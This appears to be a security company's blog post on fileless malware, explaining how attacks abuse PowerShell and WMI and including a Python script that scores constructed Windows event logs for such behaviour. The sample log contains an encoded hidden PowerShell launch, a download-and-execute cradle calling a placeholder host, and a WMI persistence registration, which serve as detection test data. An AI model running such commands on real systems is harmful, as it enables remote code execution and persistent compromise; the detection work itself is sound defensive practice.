Examining Fileless Malware Threats
Most malware is file-based, meaning that your computer is infected as a result of a file being downloaded and run. This makes detection and removal easier for antivirus software, since it can generate signatures of the malware files and scan the disk for those signatures to detect and remove them.
Conversely, fileless malware is designed not to leave a file on disk that could be scanned and compared against signatures. This type of threat instead takes advantage of programs already installed on your computer to perform its desired functions.
We’ll discuss how this works, followed by strategies for identifying and removing fileless malware on your computer.
How Fileless Malware Works
Hackers are pros at twisting benign software to suit their own purposes. Many of the most common tools used by hackers were developed by network defenders and administrators and repurposed by hackers since their functionality met the hackers’ needs. The fileless malware threat is the logical progression of this.
All computer operating systems have built-in software designed to enable administrators and power users to take full advantage of the computer’s functionality. A simple example of this is the Windows command line and its more powerful version, Windows PowerShell. An experienced user can write commands or even develop scripts for PowerShell, just like a programmer can develop Python scripts. The advantage of PowerShell over Python or Ruby is that it comes installed by default on all Windows machines.
Instead of installing and executing standalone programs on a target computer, fileless malware is designed to take advantage of the functionality built into the target computer.
For example, Windows fileless malware can be designed as a collection of PowerShell commands and Windows Management Instrumentation (a tool designed to help with enterprise-scale administration of computers) calls that accomplishes the same functionality as a traditional malware executable using only the native functionality of the Windows OS. Windows is designed to make organization-wide administration easy, but there is a fine line between legitimate administration and malicious activity, and Windows provides the tools necessary for both.
How to Detect Fileless Malware
Fileless malware lacks many of the indicators used to detect traditional malware threats. It doesn’t install any files on the disk and is primarily located in memory, which makes it more difficult to detect with traditional techniques.
One of the best ways to detect fileless malware is through behavior-based anomaly detection. The actions taken by the malware, including running PowerShell scripts and interacting with Windows Management Instrumentation, are likely outside of the normal use of the infected machine and may be detectable based on this fact.
By enabling both host-based and network-based logging and performing automated and manual analysis of the resulting logs, it may be possible to identify when a computer was infected by fileless malware, the scope of the infection, and the tools and techniques used by the infecting malware.
Fileless Malware Removal
Due to its use of low-level operating system functionality, it can be difficult to locate and remove all aspects of a fileless malware infection. Windows PowerShell and the Windows Management Instrumentation framework have access to the registry and other functionality that is commonly used for malware persistence.
The first step to removing a fileless malware infection is identifying the scope and type of threat you are experiencing. Depending on the results of the detection process, you may be able to identify the specific malware sample, or at least classify it by its behavior and likely functionality. If not, the next best step is to begin an in-depth analysis of log files and network captures to see if you can identify what services the malware is using, when the initial infection occurred, and, ideally, the infection vector. This may provide sufficient information for identification and a basis for research into the specific malware’s capabilities and recommended removal techniques.
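The behavior-based detection described in the detection section and the scope-and-timeline step above share the same mechanics: parse event records, score each one against a small set of PowerShell and WMI indicators, and then summarize what was flagged by host and time. The following Python script is an added example written for this article; it is not Sword & Shield's code or tooling. The log lines are constructed and use a simplified `timestamp|host|event_id|message` layout rather than real Windows event text, and the field names inside each message (`CommandLine=`, `ScriptBlockText=`, `Consumer=`) are assumptions for the example. The event IDs are the standard ones for process creation (4688, Security log with command-line auditing), PowerShell script block logging (4104) and WMI-Activity permanent consumer registration (5861). The weighted threshold is what keeps ordinary administrative PowerShell use (the `inventory.ps1` line) below the alerting bar.

```python
"""Score Windows event records for fileless-malware behavior and summarize scope.

Added example with constructed, simplified log lines (not real Windows event text).
Assumed field layout: timestamp|host|event_id|message
"""
import re
from collections import Counter
from datetime import datetime

# Constructed sample log: one workstation with an encoded PowerShell launch,
# a download cradle and a WMI persistence registration, plus benign activity.
SAMPLE_LOG = """\
2024-03-04T08:01:12|WS-112|4688|NewProcess=C:\\Windows\\explorer.exe CommandLine=explorer.exe
2024-03-04T08:02:40|WS-112|4688|NewProcess=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1
2024-03-04T09:15:03|WS-112|4688|NewProcess=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2024-03-04T09:15:04|WS-112|4104|ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')
2024-03-04T09:15:09|WS-112|5861|Namespace=root/subscription; Consumer=CommandLineEventConsumer.Name="Updater"; Filter=__EventFilter.Name="Updater"
2024-03-04T10:00:00|WS-301|4104|ScriptBlockText=Get-Service | Where-Object Status -eq Running
"""

# (indicator name, event id it applies to, weight, pattern over the message).
# Weights are a judgement call for this example: a single weak indicator such
# as -NoProfile is normal for admin scripts and must not alert on its own.
INDICATORS = [
    ("encoded_command", 4688, 3, re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("hidden_window",   4688, 2, re.compile(r"\s-w(indowstyle)?\s+hidden", re.I)),
    ("no_profile",      4688, 1, re.compile(r"\s-nop(rofile)?\b", re.I)),
    ("download_cradle", 4104, 3, re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I)),
    ("inline_exec",     4104, 2, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("wmi_persistence", 5861, 3, re.compile(r"CommandLineEventConsumer|ActiveScriptEventConsumer", re.I)),
]


def parse_log(text):
    """Split the simplified log into records with a parsed timestamp."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, event_id, message = line.split("|", 3)
        records.append({"time": datetime.fromisoformat(ts), "host": host,
                        "event_id": int(event_id), "message": message})
    return records


def score_record(rec):
    """Return (matched indicators, total weight) for one record."""
    hits = [(name, weight) for name, eid, weight, rx in INDICATORS
            if eid == rec["event_id"] and rx.search(rec["message"])]
    return hits, sum(w for _, w in hits)


def detect(records, threshold=3):
    """Flag records whose combined indicator weight reaches the threshold."""
    flagged = []
    for rec in records:
        hits, score = score_record(rec)
        if score >= threshold:
            flagged.append({**rec, "indicators": [n for n, _ in hits], "score": score})
    return flagged


def summarize(flagged):
    """Scope the incident: affected hosts, earliest flagged event, indicator counts."""
    if not flagged:
        return {"hosts": [], "first_seen": None, "indicator_counts": {}}
    return {
        "hosts": sorted({f["host"] for f in flagged}),
        "first_seen": min(f["time"] for f in flagged).isoformat(),
        "indicator_counts": dict(Counter(i for f in flagged for i in f["indicators"])),
    }


if __name__ == "__main__":
    found = detect(parse_log(SAMPLE_LOG))
    for f in found:
        print(f"{f['time'].isoformat()} {f['host']} event={f['event_id']} "
              f"score={f['score']} indicators={','.join(f['indicators'])}")
    print(summarize(found))
```

The summary's `first_seen` value is the starting point for the timeline work the article describes: everything before that timestamp on the affected host is where the infection vector is most likely to be found, and the `wmi_persistence` hit tells you which persistence mechanism to look at before terminating the running process.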
Fileless malware typically makes use of persistence techniques to ensure that it begins executing again after it is terminated or the infected computer is restarted. Our previous blog post discussed some of the most common persistence methods used by malware, where to look for malware and what to look for when attempting to remove it.
Fileless malware can be complicated to detect, identify, and completely remove from a system. If you suspect your computer has been infected, it may be wise to reach out to a team of experts in malware identification and removal. Contact Sword & Shield for a free consultation.